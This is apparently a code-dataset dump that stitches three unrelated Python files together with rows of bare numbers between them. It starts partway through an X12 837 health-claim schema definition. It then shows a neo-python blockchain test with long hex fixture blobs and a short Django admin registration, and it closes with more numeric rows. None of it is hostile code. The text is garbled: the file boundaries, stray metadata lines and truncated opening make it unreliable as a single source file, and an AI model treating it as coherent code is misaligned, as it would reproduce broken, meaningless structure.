"2", "3"), position=2, codes=[], ), ), Element( "HI09-04", Properties( desc="Date Time Period", req_sit="N", data_type=("AN", "1", "35"), position=3, codes=[], ), ), Element( "HI09-05", Properties( desc="Monetary Amount", req_sit="N", data_type=("R", "1", "18"), position=4, codes=[], ), ), Element( "HI09-06", Properties( desc="Quantity", req_sit="N", data_type=("R", "1", "15"), position=5, codes=[], ), ), Element( "HI09-07", Properties( desc="Version Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "HI09-08", Properties( desc="Industry Code", req_sit="N", data_type=("AN", "1", "30"), position=7, codes=[], ), ), Element( "HI09-09", Properties( desc="Yes/No Condition or Response Code", req_sit="N", data_type=("ID", "1", "1"), position=8, codes=[], ), ), ), Composite( "C022", Properties( desc="Health Care Code Information", refdes="", repeat="", req_sit="S", seq="10", ), Element( "HI10-01", Properties( desc="Code List Qualifier Code", req_sit="R", data_type=("ID", "1", "3"), position=0, codes=["BG"], ), ), Element( "HI10-02", Properties( desc="Industry Code", req_sit="R", data_type=("AN", "1", "30"), position=1, codes=[], ), ), Element( "HI10-03", Properties( desc="Date Time Period Format Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=2, codes=[], ), ), Element( "HI10-04", Properties( desc="Date Time Period", req_sit="N", data_type=("AN", "1", "35"), position=3, codes=[], ), ), Element( "HI10-05", Properties( desc="Monetary Amount", req_sit="N", data_type=("R", "1", "18"), position=4, codes=[], ), ), Element( "HI10-06", Properties( desc="Quantity", req_sit="N", data_type=("R", "1", "15"), position=5, codes=[], ), ), Element( "HI10-07", Properties( desc="Version Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "HI10-08", Properties( desc="Industry Code", req_sit="N", data_type=("AN", "1", "30"), position=7, codes=[], ), ), Element( "HI10-09", Properties( desc="Yes/No Condition or Response Code", req_sit="N", data_type=("ID", "1", "1"), position=8, codes=[], ), ), ), Composite( "C022", Properties( desc="Health Care Code Information", refdes="", repeat="", req_sit="S", seq="11", ), Element( "HI11-01", Properties( desc="Code List Qualifier Code", req_sit="R", data_type=("ID", "1", "3"), position=0, codes=["BG"], ), ), Element( "HI11-02", Properties( desc="Industry Code", req_sit="R", data_type=("AN", "1", "30"), position=1, codes=[], ), ), Element( "HI11-03", Properties( desc="Date Time Period Format Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=2, codes=[], ), ), Element( "HI11-04", Properties( desc="Date Time Period", req_sit="N", data_type=("AN", "1", "35"), position=3, codes=[], ), ), Element( "HI11-05", Properties( desc="Monetary Amount", req_sit="N", data_type=("R", "1", "18"), position=4, codes=[], ), ), Element( "HI11-06", Properties( desc="Quantity", req_sit="N", data_type=("R", "1", "15"), position=5, codes=[], ), ), Element( "HI11-07", Properties( desc="Version Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "HI11-08", Properties( desc="Industry Code", req_sit="N", data_type=("AN", "1", "30"), position=7, codes=[], ), ), Element( "HI11-09", Properties( desc="Yes/No Condition or Response Code", req_sit="N", data_type=("ID", "1", "1"), position=8, codes=[], ), ), ), Composite( "C022", Properties( desc="Health Care Code Information", refdes="", repeat="", req_sit="S", seq="12", ), Element( "HI12-01", Properties( desc="Code List Qualifier Code", req_sit="R", data_type=("ID", "1", "3"), position=0, codes=["BG"], ), ), Element( "HI12-02", Properties( desc="Industry Code", req_sit="R", data_type=("AN", "1", "30"), position=1, codes=[], ), ), Element( "HI12-03", Properties( desc="Date Time Period Format Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=2, codes=[], ), ), Element( "HI12-04", Properties( desc="Date Time Period", req_sit="N", data_type=("AN", "1", "35"), position=3, codes=[], ), ), Element( "HI12-05", Properties( desc="Monetary Amount", req_sit="N", data_type=("R", "1", "18"), position=4, codes=[], ), ), Element( "HI12-06", Properties( desc="Quantity", req_sit="N", data_type=("R", "1", "15"), position=5, codes=[], ), ), Element( "HI12-07", Properties( desc="Version Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "HI12-08", Properties( desc="Industry Code", req_sit="N", data_type=("AN", "1", "30"), position=7, codes=[], ), ), Element( "HI12-09", Properties( desc="Yes/No Condition or Response Code", req_sit="N", data_type=("ID", "1", "1"), position=8, codes=[], ), ), ), ), Segment( "HCP", Properties( desc="Claim Pricing/Repricing Information", position="2410", repeat="1", req_sit="S", syntax="R0113 P0910 P1112", ), Element( "HCP01", Properties( desc="Pricing Methodology", req_sit="R", data_type=("ID", "2", "2"), position=1, codes=[ "00", "01", "02", "03", "04", "05", "07", "08", "09", "10", "11", "12", "13", "14", ], ), ), Element( "HCP02", Properties( desc="Monetary Amount", req_sit="R", data_type=("R", "1", "18"), position=2, codes=[], ), ), Element( "HCP03", Properties( desc="Monetary Amount", req_sit="S", data_type=("R", "1", "18"), position=3, codes=[], ), ), Element( "HCP04", Properties( desc="Reference Identification", req_sit="S", data_type=("AN", "1", "50"), position=4, codes=[], ), ), Element( "HCP05", Properties( desc="Rate", req_sit="S", data_type=("R", "1", "9"), position=5, codes=[], ), ), Element( "HCP06", Properties( desc="Reference Identification", req_sit="S", data_type=("AN", "1", "50"), position=6, codes=[], ), ), Element( "HCP07", Properties( desc="Monetary Amount", req_sit="S", data_type=("R", "1", "18"), position=7, codes=[], ), ), Element( "HCP08", Properties( desc="Product/Service ID", req_sit="N", data_type=("AN", "1", "48"), position=8, codes=[], ), ), Element( "HCP09", Properties( desc="Product/Service ID Qualifier", req_sit="N", data_type=("ID", "2", "2"), position=9, codes=[], ), ), Element( "HCP10", Properties( desc="Product/Service ID", req_sit="N", data_type=("AN", "1", "48"), position=10, codes=[], ), ), Element( "HCP11", Properties( desc="Unit or Basis for Measurement Code", req_sit="N", data_type=("ID", "2", "2"), position=11, codes=[], ), ), Element( "HCP12", Properties( desc="Quantity", req_sit="N", data_type=("R", "1", "15"), position=12, codes=[], ), ), Element( "HCP13", Properties( desc="Reject Reason Code", req_sit="S", data_type=("ID", "2", "2"), position=13, codes=["T1", "T2", "T3", "T4", "T5", "T6"], ), ), Element( "HCP14", Properties( desc="Policy Compliance Code", req_sit="S", data_type=("ID", "1", "2"), position=14, codes=["1", "2", "3", "4", "5"], ), ), Element( "HCP15", Properties( desc="Exception Code", req_sit="S", data_type=("ID", "1", "2"), position=15, codes=["1", "2", "3", "4", "5", "6"], ), ), ), parsed_837_2310A, parsed_837_2310B, parsed_837_2310C, parsed_837_2310D, parsed_837_2310E, parsed_837_2310F, parsed_837_2320, parsed_837_2400, ) parsed_837_2000C = Loop( "2000C", Properties( desc="Patient Hierarchical Level", looptype="", position="1400", repeat=">1", req_sit="S", ), Segment( "HL", Properties( desc="Patient Hierarchical Level", position="0010", repeat="1", req_sit="R", syntax="", ), Element( "HL01", Properties( desc="Hierarchical ID Number", req_sit="R", data_type=("AN", "1", "12"), position=1, codes=[], ), ), Element( "HL02", Properties( desc="Hierarchical Parent ID Number", req_sit="R", data_type=("AN", "1", "12"), position=2, codes=[], ), ), Element( "HL03", Properties( desc="Hierarchical Level Code", req_sit="R", data_type=("ID", "1", "2"), position=3, codes=["23"], ), ), Element( "HL04", Properties( desc="Hierarchical Child Code", req_sit="R", data_type=("ID", "1", "1"), position=4, codes=["0"], ), ), ), Segment( "PAT", Properties( desc="Patient Information", position="0070", repeat="1", req_sit="R", syntax="P0506 P0708", ), Element( "PAT01", Properties( desc="Individual Relationship Code", req_sit="R", data_type=("ID", "2", "2"), position=1, codes=["01", "19", "20", "21", "39", "40", "53", "G8"], ), ), Element( "PAT02", Properties( desc="Patient Location Code", req_sit="N", data_type=("ID", "1", "1"), position=2, codes=[], ), ), Element( "PAT03", Properties( desc="Employment Status Code", req_sit="N", data_type=("ID", "2", "2"), position=3, codes=[], ), ), Element( "PAT04", Properties( desc="Student Status Code", req_sit="N", data_type=("ID", "1", "1"), position=4, codes=[], ), ), Element( "PAT05", Properties( desc="Date Time Period Format Qualifier", req_sit="S", data_type=("ID", "2", "3"), position=5, codes=["D8"], ), ), Element( "PAT06", Properties( desc="Date Time Period", req_sit="S", data_type=("AN", "1", "35"), position=6, codes=[], ), ), Element( "PAT07", Properties( desc="Unit or Basis for Measurement Code", req_sit="S", data_type=("ID", "2", "2"), position=7, codes=["01"], ), ), Element( "PAT08", Properties( desc="Weight", req_sit="S", data_type=("R", "1", "10"), position=8, codes=[], ), ), Element( "PAT09", Properties( desc="Yes/No Condition or Response Code", req_sit="S", data_type=("ID", "1", "1"), position=9, codes=["Y"], ), ), ), parsed_837_2010CA, parsed_837_2300, ) parsed_837_2000B = Loop( "2000B", Properties( desc="Subscriber Hierarchical Level", looptype="", position="0200", repeat=">1", req_sit="R", ), Segment( "HL", Properties( desc="Subscriber Hierarchical Level", position="0010", repeat="1", req_sit="R", syntax="", ), Element( "HL01", Properties( desc="Hierarchical ID Number", req_sit="R", data_type=("AN", "1", "12"), position=1, codes=[], ), ), Element( "HL02", Properties( desc="Hierarchical Parent ID Number", req_sit="R", data_type=("AN", "1", "12"), position=2, codes=[], ), ), Element( "HL03", Properties( desc="Hierarchical Level Code", req_sit="R", data_type=("ID", "1", "2"), position=3, codes=["22"], ), ), Element( "HL04", Properties( desc="Hierarchical Child Code", req_sit="R", data_type=("ID", "1", "1"), position=4, codes=["0", "1"], ), ), ), Segment( "SBR", Properties( desc="Subscriber Information", position="0050", repeat="1", req_sit="R", syntax="", ), Element( "SBR01", Properties( desc="Payer Responsibility Sequence Number Code", req_sit="R", data_type=("ID", "1", "1"), position=1, codes=["A", "B", "C", "D", "E", "F", "G", "H", "P", "S", "T", "U"], ), ), Element( "SBR02", Properties( desc="Individual Relationship Code", req_sit="S", data_type=("ID", "2", "2"), position=2, codes=["18"], ), ), Element( "SBR03", Properties( desc="Reference Identification", req_sit="S", data_type=("AN", "1", "50"), position=3, codes=[], ), ), Element( "SBR04", Properties( desc="Name", req_sit="S", data_type=("AN", "1", "60"), position=4, codes=[], ), ), Element( "SBR05", Properties( desc="Insurance Type Code", req_sit="S", data_type=("ID", "1", "3"), position=5, codes=["12", "13", "14", "15", "16", "41", "42", "43", "47"], ), ), Element( "SBR06", Properties( desc="Coordination of Benefits Code", req_sit="N", data_type=("ID", "1", "1"), position=6, codes=[], ), ), Element( "SBR07", Properties( desc="Yes/No Condition or Response Code", req_sit="N", data_type=("ID", "1", "1"), position=7, codes=[], ), ), Element( "SBR08", Properties( desc="Employment Status Code", req_sit="N", data_type=("ID", "2", "2"), position=8, codes=[], ), ), Element( "SBR09", Properties( desc="Claim Filing Indicator Code", req_sit="S", data_type=("ID", "1", "2"), position=9, codes=[ "11", "12", "13", "14", "15", "16", "17", "AM", "BL", "CH", "CI", "DS", "FI", "HM", "LM", "MA", "MB", "MC", "OF", "TV", "VA", "WC", "ZZ", ], ), ), ), Segment( "PAT", Properties( desc="Patient Information", position="0070", repeat="1", req_sit="S", syntax="P0506 P0708", ), Element( "PAT01", Properties( desc="Individual Relationship Code", req_sit="N", data_type=("ID", "2", "2"), position=1, codes=[], ), ), Element( "PAT02", Properties( desc="Patient Location Code", req_sit="N", data_type=("ID", "1", "1"), position=2, codes=[], ), ), Element( "PAT03", Properties( desc="Employment Status Code", req_sit="N", data_type=("ID", "2", "2"), position=3, codes=[], ), ), Element( "PAT04", Properties( desc="Student Status Code", req_sit="N", data_type=("ID", "1", "1"), position=4, codes=[], ), ), Element( "PAT05", Properties( desc="Date Time Period Format Qualifier", req_sit="S", data_type=("ID", "2", "3"), position=5, codes=["D8"], ), ), Element( "PAT06", Properties( desc="Date Time Period", req_sit="S", data_type=("AN", "1", "35"), position=6, codes=[], ), ), Element( "PAT07", Properties( desc="Unit or Basis for Measurement Code", req_sit="S", data_type=("ID", "2", "2"), position=7, codes=["01"], ), ), Element( "PAT08", Properties( desc="Weight", req_sit="S", data_type=("R", "1", "10"), position=8, codes=[], ), ), Element( "PAT09", Properties( desc="Yes/No Condition or Response Code", req_sit="S", data_type=("ID", "1", "1"), position=9, codes=["Y"], ), ), ), parsed_837_2010BA, parsed_837_2010BB, parsed_837_2300, parsed_837_2000C, ) parsed_837_2000A = Loop( "2000A", Properties( desc="Billing Provider Hierarchical Level", looptype="", position="0010", repeat=">1", req_sit="R", ), Segment( "HL", Properties( desc="Billing Provider Hierarchical Level", position="0010", repeat="1", req_sit="R", syntax="", ), Element( "HL01", Properties( desc="Hierarchical ID Number", req_sit="R", data_type=("AN", "1", "12"), position=1, codes=[], ), ), Element( "HL02", Properties( desc="Hierarchical Parent ID Number", req_sit="N", data_type=("AN", "1", "12"), position=2, codes=[], ), ), Element( "HL03", Properties( desc="Hierarchical Level Code", req_sit="R", data_type=("ID", "1", "2"), position=3, codes=["20"], ), ), Element( "HL04", Properties( desc="Hierarchical Child Code", req_sit="R", data_type=("ID", "1", "1"), position=4, codes=["1"], ), ), ), Segment( "PRV", Properties( desc="Billing Provider Specialty Information", position="0030", repeat="1", req_sit="S", syntax="P0203", ), Element( "PRV01", Properties( desc="Provider Code", req_sit="R", data_type=("ID", "1", "3"), position=1, codes=["BI"], ), ), Element( "PRV02", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=2, codes=["PXC"], ), ), Element( "PRV03", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=3, codes=[], ), ), Element( "PRV04", Properties( desc="State or Province Code", req_sit="N", data_type=("ID", "2", "2"), position=4, codes=[], ), ), Composite( "C035", Properties( desc="Provider Specialty Information", refdes="", repeat="", req_sit="N", seq="05", ), ), Element( "PRV06", Properties( desc="Provider Organization Code", req_sit="N", data_type=("ID", "3", "3"), position=6, codes=[], ), ), ), Segment( "CUR", Properties( desc="Foreign Currency Information", position="0100", repeat="1", req_sit="S", syntax="C0807 C0907 L101112 C1110 C1210 L131415 C1413 C1513 L161718 C1716 C1816 L192021 C2019 C2119", ), Element( "CUR01", Properties( desc="Entity Identifier Code", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["85"], ), ), Element( "CUR02", Properties( desc="Currency Code", req_sit="R", data_type=("ID", "3", "3"), position=2, codes=[], ), ), Element( "CUR03", Properties( desc="Exchange Rate", req_sit="N", data_type=("R", "4", "10"), position=3, codes=[], ), ), Element( "CUR04", Properties( desc="Entity Identifier Code", req_sit="N", data_type=("ID", "2", "3"), position=4, codes=[], ), ), Element( "CUR05", Properties( desc="Currency Code", req_sit="N", data_type=("ID", "3", "3"), position=5, codes=[], ), ), Element( "CUR06", Properties( desc="Currency Market/Exchange Code", req_sit="N", data_type=("ID", "3", "3"), position=6, codes=[], ), ), Element( "CUR07", Properties( desc="Date/Time Qualifier", req_sit="N", data_type=("ID", "3", "3"), position=7, codes=[], ), ), Element( "CUR08", Properties( desc="Date", req_sit="N", data_type=("DT", "8", "8"), position=8, codes=[], ), ), Element( "CUR09", Properties( desc="Time", req_sit="N", data_type=("TM", "4", "8"), position=9, codes=[], ), ), Element( "CUR10", Properties( desc="Date/Time Qualifier", req_sit="N", data_type=("ID", "3", "3"), position=10, codes=[], ), ), Element( "CUR11", Properties( desc="Date", req_sit="N", data_type=("DT", "8", "8"), position=11, codes=[], ), ), Element( "CUR12", Properties( desc="Time", req_sit="N", data_type=("TM", "4", "8"), position=12, codes=[], ), ), Element( "CUR13", Properties( desc="Date/Time Qualifier", req_sit="N", data_type=("ID", "3", "3"), position=13, codes=[], ), ), Element( "CUR14", Properties( desc="Date", req_sit="N", data_type=("DT", "8", "8"), position=14, codes=[], ), ), Element( "CUR15", Properties( desc="Time", req_sit="N", data_type=("TM", "4", "8"), position=15, codes=[], ), ), Element( "CUR16", Properties( desc="Date/Time Qualifier", req_sit="N", data_type=("ID", "3", "3"), position=16, codes=[], ), ), Element( "CUR17", Properties( desc="Date", req_sit="N", data_type=("DT", "8", "8"), position=17, codes=[], ), ), Element( "CUR18", Properties( desc="Time", req_sit="N", data_type=("TM", "4", "8"), position=18, codes=[], ), ), Element( "CUR19", Properties( desc="Date/Time Qualifier", req_sit="N", data_type=("ID", "3", "3"), position=19, codes=[], ), ), Element( "CUR20", Properties( desc="Date", req_sit="N", data_type=("DT", "8", "8"), position=20, codes=[], ), ), Element( "CUR21", Properties( desc="Time", req_sit="N", data_type=("TM", "4", "8"), position=21, codes=[], ), ), ), parsed_837_2010AA, parsed_837_2010AB, parsed_837_2010AC, parsed_837_2000B, ) parsed_837_DETAIL = Loop( "DETAIL", Properties( desc="Table 2 - Detail", looptype="wrapper", position="0200", repeat=">1", req_sit="S", ), parsed_837_2000A, ) parsed_837_ST_LOOP = Loop( "ST_LOOP", Properties( desc="Transaction Set Header", looptype="explicit", position="0200", repeat=">1", req_sit="R", ), Segment( "ST", Properties( desc="Transaction Set Header", position="0050", repeat="1", req_sit="R", syntax="", ), Element( "ST01", Properties( desc="Transaction Set Identifier Code", req_sit="R", data_type=("ID", "3", "3"), position=1, codes=["837"], ), ), Element( "ST02", Properties( desc="Transaction Set Control Number", req_sit="R", data_type=("AN", "4", "9"), position=2, codes=[], ), ), Element( "ST03", Properties( desc="Implementation Convention Reference", req_sit="S", data_type=("AN", "1", "35"), position=3, codes=[], ), ), ), parsed_837_HEADER, parsed_837_DETAIL, Segment( "SE", Properties( desc="Transaction Set Trailer", position="5550", repeat="1", req_sit="R", syntax="", ), Element( "SE01", Properties( desc="Number of Included Segments", req_sit="R", data_type=("N0", "1", "10"), position=1, codes=[], ), ), Element( "SE02", Properties( desc="Transaction Set Control Number", req_sit="R", data_type=("AN", "4", "9"), position=2, codes=[], ), ), ), ) parsed_837_GS_LOOP = Loop( "GS_LOOP", Properties( desc="Functional Group Header", looptype="explicit", position="0200", repeat=">1", req_sit="R", ), Segment( "GS", Properties( desc="Functional Group Header", position="0100", repeat="1", req_sit="R", syntax="", ), Element( "GS01", Properties( desc="Functional Identifier Code", req_sit="R", data_type=("ID", "2", "2"), position=1, codes=["HC"], ), ), Element( "GS02", Properties( desc="Application Senders Code", req_sit="R", data_type=("AN", "2", "15"), position=2, codes=[], ), ), Element( "GS03", Properties( desc="124", req_sit="R", data_type=("AN", "2", "15"), position=3, codes=[], ), ), Element( "GS04", Properties( desc="Date", req_sit="R", data_type=("DT", "8", "8"), position=4, codes=[], ), ), Element( "GS05", Properties( desc="Time", req_sit="R", data_type=("TM", "4", "8"), position=5, codes=[], ), ), Element( "GS06", Properties( desc="Group Control Number", req_sit="R", data_type=("N0", "1", "9"), position=6, codes=[], ), ), Element( "GS07", Properties( desc="Responsible Agency Code", req_sit="R", data_type=("ID", "1", "2"), position=7, codes=["X"], ), ), Element( "GS08", Properties( desc="Version / Release / Industry Identifier Code", req_sit="R", data_type=("AN", "1", "12"), position=8, codes=["005010X222A1"], ), ), ), parsed_837_ST_LOOP, Segment( "GE", Properties( desc="Functional Group Trailer", position="0300", repeat="1", req_sit="R", syntax="", ), Element( "GE01", Properties( desc="97", req_sit="R", data_type=("N0", "1", "6"), position=1, codes=[] ), ), Element( "GE02", Properties( desc="Group Control Number", req_sit="R", data_type=("N0", "1", "9"), position=2, codes=[], ), ), ), ) parsed_837_ISA_LOOP = Loop( "ISA_LOOP", Properties( desc="Interchange Control Header", looptype="explicit", position="0010", repeat=">1", req_sit="R", ), Segment( "ISA", Properties( desc="Interchange Control Header", position="0100", repeat="1", req_sit="R", syntax="", ), Element( "ISA01", Properties( desc="I01", req_sit="R", data_type=("ID", "2", "2"), position=1, codes=["00", "03"], ), ), Element( "ISA02", Properties( desc="I02", req_sit="R", data_type=("AN", "10", "10"), position=2, codes=[], ), ), Element( "ISA03", Properties( desc="I03", req_sit="R", data_type=("ID", "2", "2"), position=3, codes=["00", "01"], ), ), Element( "ISA04", Properties( desc="I04", req_sit="R", data_type=("AN", "10", "10"), position=4, codes=[], ), ), Element( "ISA05", Properties( desc="I05", req_sit="R", data_type=("ID", "2", "2"), position=5, codes=["01", "14", "20", "27", "28", "29", "30", "33", "ZZ"], ), ), Element( "ISA06", Properties( desc="I06", req_sit="R", data_type=("AN", "15", "15"), position=6, codes=[], ), ), Element( "ISA07", Properties( desc="I05", req_sit="R", data_type=("ID", "2", "2"), position=7, codes=["01", "14", "20", "27", "28", "29", "30", "33", "ZZ"], ), ), Element( "ISA08", Properties( desc="I07", req_sit="R", data_type=("AN", "15", "15"), position=8, codes=[], ), ), Element( "ISA09", Properties( desc="I08", req_sit="R", data_type=("DT", "6", "6"), position=9, codes=[], ), ), Element( "ISA10", Properties( desc="I09", req_sit="R", data_type=("TM", "4", "4"), position=10, codes=[], ), ), Element( "ISA11", Properties( desc="I10", req_sit="R", data_type=("ID", "1", "1"), position=11, codes=[], ), ), Element( "ISA12", Properties( desc="I11", req_sit="R", data_type=("ID", "5", "5"), position=12, codes=["00501"], ), ), Element( "ISA13", Properties( desc="I12", req_sit="R", data_type=("N0", "9", "9"), position=13, codes=[], ), ), Element( "ISA14", Properties( desc="I13", req_sit="R", data_type=("ID", "1", "1"), position=14, codes=["0", "1"], ), ), Element( "ISA15", Properties( desc="I14", req_sit="R", data_type=("ID", "1", "1"), position=15, codes=["P", "T"], ), ), Element( "ISA16", Properties( desc="I15", req_sit="R", data_type=("AN", "1", "1"), position=16, codes=[], ), ), ), parsed_837_GS_LOOP, Segment( "TA1", Properties( desc="Interchange Acknowledgement", position="0200", repeat="1", req_sit="S", syntax="", ), Element( "TA101", Properties( desc="I12", req_sit="R", data_type=("N0", "9", "9"), position=1, codes=[], ), ), Element( "TA102", Properties( desc="I08", req_sit="R", data_type=("DT", "6", "6"), position=2, codes=[], ), ), Element( "TA103", Properties( desc="I09", req_sit="R", data_type=("TM", "4", "4"), position=3, codes=[], ), ), Element( "TA104", Properties( desc="I17", req_sit="R", data_type=("ID", "1", "1"), position=4, codes=["A", "E", "R"], ), ), Element( "TA105", Properties( desc="I18", req_sit="R", data_type=("ID", "3", "3"), position=5, codes=[ "000", "001", "002", "003", "004", "005", "006", "007", "008", "009", "010", "011", "012", "013", "014", "015", "016", "017", "018", "019", "020", "021", "022", "023", "024", "025", "026", "027", "028", "029", "030", "031", ], ), ), ), Segment( "IEA", Properties( desc="Interchange Control Trailer", position="0300", repeat="1", req_sit="R", syntax="", ), Element( "IEA01", Properties( desc="I16", req_sit="R", data_type=("N0", "1", "5"), position=1, codes=[], ), ), Element( "IEA02", Properties( desc="I12", req_sit="R", data_type=("N0", "9", "9"), position=2, codes=[], ), ), ), ) parsed_837 = Message( "837", Properties(desc="HIPAA Health Care Claim: Professional X222A1-837"), parsed_837_ISA_LOOP, )
26.657891
121
0.310715
65,250
950,807
4.424291
0.020506
0.172693
0.034893
0.049992
0.988766
0.986414
0.985039
0.984183
0.983456
0.981572
0
0.06527
0.55568
950,807
35,666
122
26.658638
0.618068
0.000076
0
0.990382
1
0
0.128106
0.000097
0
0
0
0
0
1
0
false
0
0.000028
0
0.000028
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
1
0
0
0
0
0
0
0
1
1
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
9
9ecea7c14561252cb32b0730f867255188015cf1
3,692
py
Python
neo/SmartContract/tests/test_smart_contract.py
WhisperQFun/neo-python
1790581bfb9c91e92814fe6624997f90c08f989f
[ "MIT" ]
null
null
null
neo/SmartContract/tests/test_smart_contract.py
WhisperQFun/neo-python
1790581bfb9c91e92814fe6624997f90c08f989f
[ "MIT" ]
null
null
null
neo/SmartContract/tests/test_smart_contract.py
WhisperQFun/neo-python
1790581bfb9c91e92814fe6624997f90c08f989f
[ "MIT" ]
null
null
null
from neo.Utils.BlockchainFixtureTestCase import BlockchainFixtureTestCase from neo.IO.Helper import Helper from neo.Core.TX.Transaction import TransactionType from neo.Settings import settings import os import binascii class SmartContractTest(BlockchainFixtureTestCase): @classmethod def leveldb_testpath(self): return os.path.join(settings.DATA_DIR_PATH, 'fixtures/test_chain') # test need to be updated whenever we change the fixtures def test_a_initial_setup(self): self.assertEqual(self._blockchain.Height, 12349) invb = b'000000007134e5ee56f841bb73dbff969a9ef793c05f175cd386b2f24874a54c441cc0500e6c4e19da72fd4956a28670f36d26e03fd43c1794a1d3a5ad4f738dd48b53f505c7605b992400006b76abd322b7bd0bbe48d3a3f5d10013ab9ffee489706078714f1ea201c3400df8020bf9c22cd865b43b73060be3302abbab95b5f38941ba288cd77b846c9c1edcef1ab9a108f0a2fb8180e88178d3e85e316243054e48b29ced9dde54766340d9efc4f6d78970aba6712688071b862413bd53d58620e87c951aa3eac5c2611cdfecfcf084c12cfbe6cd356ef7726b9b5e93c10b5ffa7dc6e77ae8dc8c7af09240756caac1dad30a93662f36194fe270bb2afe0a557492122027df5f95dc5b1b9d18b169a6a96795019067ba008e5d42250c23886f0807ec20f3c880b2e740d1048b532102103a7f7dd016558597f7960d27c516a4394fd968b9e65155eb4b013e4040406e2102a7bc55fe8684e0119768d104ba30795bdcc86619e864add26156723ed185cd622102b3622bf4017bdfe317c58aed5f4c753f206b7db896046fa7d774bbc4bf7f8dc22103d90c07df63e690ce77912e10ab51acc944b66860237b608c4f8f8309e71ee69954ae0200006b76abd300000000d101de39202f726f6f742f2e6e656f707974686f6e2f436861696e732f556e6974546573742d534d2f636f6e7472616374732f73616d706c65322e70790474657374047465737404746573740474657374000102030702024c725ec56b6a00527ac46a51527ac46a52527ac46a00c3036164649c640d006a51c36a52c3936c7566616a00c3037375629c640d006a51c36a52c3946c7566616a00c3036d756c9c640d006a51c36a52c3956c7566616a00c3036469769c640d006a51c36a52c3966c7566614f6c7566006c756668134e656f2e436f6e74726163742e437265617465001a7118020000000001347fff9221a8caf429279a82906688eb78264c1a9a2791d95ee47b6e095120aa000001e72d286979ee6cb1b7e65dfddfb2e384100b8d148e7758de42e4168b71792c600080b5fc5c02000023ba2703c53263e8d6e522dc32203339dcd8eee90141405787dc8c47ba7da02668582b822bb50e1b615546a5f01826967cba603a0744a01aed6c098d809f20ec199a84269aa01ea911564effe7c1b4ad65d71f4ca995a12321031a6c6fbbdf02ca351745fa86b9ba5a9452d785ac4f7fc2b7548ca2a46c4fcf4aac' invbh = b'ac2d9d876bb6ee5cf1d011820409180cda7594b88c94f94a110ce2f5e472294e' invtxh = '39202f726f6f742f2e6e656f707974686f6e2f436861696e732f556e6974546573742d534d2f636f6e7472616374732f73616d706c65322e70790474657374047465737404746573740474657374000102030702024c725ec56b6a00527ac46a51527ac46a52527ac46a00c3036164649c640d006a51c36a52c3936c7566616a00c3037375629c640d006a51c36a52c3946c7566616a00c3036d756c9c640d006a51c36a52c3956c7566616a00c3036469769c640d006a51c36a52c3966c7566614f6c7566006c756668134e656f2e436f6e74726163742e437265617465' def test_a_invocation_block(self): hexdata = binascii.unhexlify(self.invb) block = Helper.AsSerializableWithType(hexdata, 'neo.Core.Block.Block') self.assertEqual(block.Hash.ToBytes(), self.invbh) self.assertEqual(block.Index, 9369) invtx = None for tx in block.Transactions: if tx.Type == TransactionType.InvocationTransaction: invtx = tx self.assertIsNotNone(invtx) self.assertEqual(len(invtx.Script), 222) self.assertEqual(invtx.Script.hex(), self.invtxh) def test_a_run_sc(self): hexdata = binascii.unhexlify(self.invb) block = Helper.AsSerializableWithType(hexdata, 'neo.Core.Block.Block') result = self._blockchain.Persist(block) self.assertTrue(result)
72.392157
1,784
0.884345
165
3,692
19.69697
0.472727
0.023077
0.007385
0.017231
0.057231
0.057231
0.057231
0.057231
0.057231
0.057231
0
0.485563
0.080715
3,692
50
1,785
73.84
0.472009
0.014897
0
0.125
0
0
0.642916
0.626685
0
1
0
0
0.21875
1
0.125
false
0
0.1875
0.03125
0.46875
0
0
0
1
null
0
0
0
0
0
0
0
0
0
0
1
0
0
0
1
0
1
0
0
0
0
0
1
1
null
1
0
0
0
0
0
0
0
0
0
0
0
0
7
9ed97fbe72e51be409cab21e009c6b1db7ca6569
115
py
Python
src/researchhub_document/related_models/constants/editor_type.py
ResearchHub/ResearchHub-Backend-Open
d36dca33afae2d442690694bb2ab17180d84bcd3
[ "MIT" ]
18
2021-05-20T13:20:16.000Z
2022-02-11T02:40:18.000Z
src/researchhub_document/related_models/constants/editor_type.py
ResearchHub/ResearchHub-Backend-Open
d36dca33afae2d442690694bb2ab17180d84bcd3
[ "MIT" ]
109
2021-05-21T20:14:23.000Z
2022-03-31T20:56:10.000Z
src/researchhub_document/related_models/constants/editor_type.py
ResearchHub/ResearchHub-Backend-Open
d36dca33afae2d442690694bb2ab17180d84bcd3
[ "MIT" ]
4
2021-05-17T13:47:53.000Z
2022-02-12T10:48:21.000Z
CK_EDITOR = 'CK_EDITOR' DRAFT_JS = 'DRAFT_JS' EDITOR_TYPES = ( (CK_EDITOR, CK_EDITOR), (DRAFT_JS, DRAFT_JS) )
14.375
25
0.695652
18
115
3.944444
0.277778
0.450704
0.28169
0.450704
0.84507
0.84507
0.84507
0.84507
0
0
0
0
0.165217
115
7
26
16.428571
0.739583
0
0
0
0
0
0.147826
0
0
0
0
0
0
1
0
false
0
0
0
0
0
1
0
0
null
1
1
1
1
1
1
1
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
9
73053753b9679f65365611fc6443983fc798a7e2
159
py
Python
photo/admin.py
prajalpatidar06/Hazel
76ce084ab81962d579f1e14e3258f332b3bb4965
[ "Apache-2.0" ]
null
null
null
photo/admin.py
prajalpatidar06/Hazel
76ce084ab81962d579f1e14e3258f332b3bb4965
[ "Apache-2.0" ]
null
null
null
photo/admin.py
prajalpatidar06/Hazel
76ce084ab81962d579f1e14e3258f332b3bb4965
[ "Apache-2.0" ]
null
null
null
from django.contrib import admin # Register your models here. from .models import Photo,Category admin.site.register(Category) admin.site.register(Photo)
26.5
35
0.792453
22
159
5.727273
0.545455
0.206349
